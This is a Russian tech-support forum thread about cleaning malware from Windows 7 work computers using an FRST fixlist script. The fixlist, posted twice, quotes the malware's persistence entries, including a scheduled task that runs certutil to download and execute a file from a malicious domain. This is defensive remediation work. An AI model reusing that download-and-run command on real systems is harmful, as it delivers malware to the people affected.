Перейти к содержанию

Так же Windows 7 newscommer


Рекомендуемые сообщения

Здравствуйте. На работе какая-то часть компьютеров была заражена вирусом. Каждый описываю в разной теме                                                                                                                                                        
Проверял CureIt - ничего.
В случае с Windows 7 срабатывает AVG, что оборвано соединение с newscommer.com/.../app.exe , после чего падает explorer
на компах с семеркой где нету AVG просто начинает очень глючить, некоторые окна сами закрываются, иногда тоже падает explorer.

Addition.txt

CollectionLog-2019.03.20-09.24.zip

FRST.txt

Ссылка на комментарий
Поделиться на другие сайты

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2915895736-2790230944-304291483-1000\...\Run: [SparklingThunder] => C:\Windows\rss\csrss.exe [4917760 2019-03-19] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2915895736-2790230944-304291483-1000\...\Run: [CloudNet] => C:\Users\Ира\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-03-19] (EpicNet Inc.) [File not signed] <==== ATTENTION
R2 WinDefender; C:\Windows\windefender.exe [0 ](Access Denied)<==== ATTENTION (Access Denied)
2019-03-20 08:15 - 2019-03-20 08:15 - 000003480 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-03-19 15:10 - 2019-03-19 15:10 - 000000000 ____D C:\Users\Ира\AppData\Roaming\EpicNet Inc
2019-03-19 15:08 - 2019-03-20 08:15 - 000003180 _____ C:\Windows\System32\Tasks\csrss
Task: {2A203543-2CF7-4CF0-8C51-091B139F6D0A} - System32\Tasks\At1 => C:\Windows\system32\SSVICHOSST.exe <==== ATTENTION
Task: {BDE7845E-812E-4618-A82F-862A04893AE2} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {E83BEC07-F184-462D-9357-1C9C4CF46F0C} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nadequalif.club/app/app.exe C:\Users\Ира\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ира\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
FirewallRules: [{414A94DA-F1ED-43D3-9C9C-66171D0E7268}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{8B42C0A7-503B-4E01-92AC-0B1431A2E1D7}] => (Allow) C:\Users\Ира\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
zip:C:\FRST\Quarantine
EmptyTemp:



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Ссылка на комментарий
Поделиться на другие сайты

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
 
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2915895736-2790230944-304291483-1000\...\Run: [SparklingThunder] => C:\Windows\rss\csrss.exe [4917760 2019-03-19] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-2915895736-2790230944-304291483-1000\...\Run: [CloudNet] => C:\Users\Ира\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-03-19] (EpicNet Inc.) [File not signed] <==== ATTENTION
R2 WinDefender; C:\Windows\windefender.exe [0 ](Access Denied)<==== ATTENTION (Access Denied)
2019-03-20 08:15 - 2019-03-20 08:15 - 000003480 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-03-19 15:10 - 2019-03-19 15:10 - 000000000 ____D C:\Users\Ира\AppData\Roaming\EpicNet Inc
2019-03-19 15:08 - 2019-03-20 08:15 - 000003180 _____ C:\Windows\System32\Tasks\csrss
Task: {2A203543-2CF7-4CF0-8C51-091B139F6D0A} - System32\Tasks\At1 => C:\Windows\system32\SSVICHOSST.exe <==== ATTENTION
Task: {BDE7845E-812E-4618-A82F-862A04893AE2} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {E83BEC07-F184-462D-9357-1C9C4CF46F0C} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nadequalif.club/app/app.exe C:\Users\Ира\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ира\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
FirewallRules: [{414A94DA-F1ED-43D3-9C9C-66171D0E7268}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{8B42C0A7-503B-4E01-92AC-0B1431A2E1D7}] => (Allow) C:\Users\Ира\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
zip:C:\FRST\Quarantine
EmptyTemp:
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

 

 

 

Скрипт выполнил

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

 

fixlist content:

*****************
EmptyTemp:
*****************

 

Вы как-то очень избирательно скопировали скрипт. У Вас какие-то сложности при выполнении инструкций? 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • sputnikk
      От sputnikk
      Страница загрузки Windows 10 Technical Preview
      http://windows.microsoft.com/ru-ru/windows/preview-coming-soon
    • gennadij-zaripov
      От gennadij-zaripov
      Пробовал обновить через Microsoft Store. Когда перестали работать-не помню. Windows 11 Pro 23H2.
       


    • zimok
      От zimok
      Коллеги, Добрый день!
      Прошу подсказать, а был ли опыт по возможности установки Kaspersky Endpoint Security for Windows по средством ansible ? Именно установкой по средством ansible роли и ОС Windows.
    • ilia_.7
      От ilia_.7
      ноутбук новый системные приложения такие как PowerShell, Edge и другие уже были и не переустанавливались.
      не сразу, но стал замечать что в рандомные моменты на мгновенье, приостанавливая все процессы, возникало окно с заголовком пути к PowerShell-у, но только через папку sustem32
      я его перемещал, и на время возникновения прекратились, но потом мне понадобилось PowerShell вернуть на место для работы с ним, и он не хотел ни как перемещаться, но зато он копировался. оба, отдельный и в system32 не хотят удаляться. после возникновения возобновились.
      касперский при возникновениях в мониторинге активности выводит следущее сообщение:
      17.11.2024 13:30:07;Запрещено;Windows PowerShell;powershell.exe;C:\Windows\System32\WindowsPowerShell\v1.0;23452;IRBIS-15NBC1012\Irbis;Активный пользователь;Запрещено: PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.b;Запрещено;PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.b;Троянское приложение;Высокая;Точно;powershell.exe;powershell.exe;c:\windows\system32\windowspowershell\v1.0;Процесс;
       
      CollectionLog-2024.11.21-20.30.zip
    • SEcrash63
      От SEcrash63
      Доброго всем времени суток.
      Может быть кто сможет помочь, с такой проблемой.
      Имеется ПК с установленной W7 x64 (без SP1, установить не могу обновление, ругается на поврежденное хранилище)
       
      Случилась проблема что перестали работать многие сетевые службы и другие, ПК перестал выходить в интернет, получать Ip и много чего.
      Частично проблемы удалось исправить, но привести полностью в рабочее состояние так и не удалось. Журнал событий ругается как минимум на две ошибки,  одна из них проблема со службой
      "Служба "Служба политики диагностики" завершена из-за ошибки. Не удается найти указанный файл." 
      И "Не удается найти описание для идентификатора события 0 из источника .NET Runtime. Вызывающий данное событие компонент не установлен на этом локальном компьютере или поврежден. Установите или восстановите компонент на локальном компьютере. .NET Runtime version : 2.0.50727.8806 - Отладчик не найден.Не указан зарегистрированный отладчик JIT"
       
      Делал сканирование системы SFC \SCANNOW говорит проблемы есть, но починить не могу.
      Делал DISM /Online /Cleanup-Image /ScanHealth - по его логам с доноров пособирал большую часть файлов, часть выкорчевывал из пакетов обновлений, но не все удалось найти. 
      Антивирус был все время Kaspersky, после появления проблем временно все удалил. Сейчас никакого антивируса нет.
      Логи и того и другого прилагаю.
      Подскажите может кто сможет поделится файлами из лога CheckSUR.
      Или может быть подскажете другие пути решения проблемы? (Систему с нуля бы поставил, было бы проще, но в данном случае это не предоставляется возможным, очень важно сохранить рабой вариант текущей)
       
      Заранее спасибо.
       
      CBS.log CheckSUR7.log sfcdetails.txt SFCFix.txt
×
×
  • Создать...